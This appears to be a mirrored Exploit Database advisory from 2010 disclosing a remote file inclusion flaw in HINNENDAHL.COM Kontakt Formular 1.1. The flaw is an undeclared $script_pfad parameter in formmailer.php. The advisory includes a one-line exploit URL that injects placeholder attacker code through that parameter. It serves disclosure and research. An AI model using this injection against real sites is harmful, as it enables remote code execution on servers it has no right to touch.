kontakt formular 1.1 – Remote File Inclusion

• Exploit Database
• 38 阅读

• 作者： bd0rk
  日期： 2010-08-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14809/

• ########################################################
  ##
  # HINNENDAHL.COM Kontakt Formular 1.1 (formmailer.php) #
  ##
  # Remote File Inclusion Vulnerability#
  ##
  # by bd0rk || SOH-Crew # ##
  #www.soh-crew.it.tt#
  ##
  #Contact: bd0rk[at]hackermail.com#
  ##
  ########################################################
  
  
  [~] Affected-Software: HINNENDAHL.COM Kontakt Formular 1.1
  
  [~] Vendor: http://www.hinnendahl.com/
  
  [~] Download: http://www.hinnendahl.com/index.php?seite=download
  
  [*] Greetz: inj3ct0r, DNX, Chip D3 Bi0s
  
  
  Description: The $script_pfad parameter in /kontaktformular/formmailer.php
   isn't declared before require. So an attacker can execute some
   php-shellcode about it. (line 2 - 3)
  
  
  
  [+]Exploit: http://www.example.com/kontaktformular/formmailer.php?script_pfad=[Ev!LC0de]
  
  
  
  ### The 21 years old, german Hacker bd0rk ### <---white-hat :-)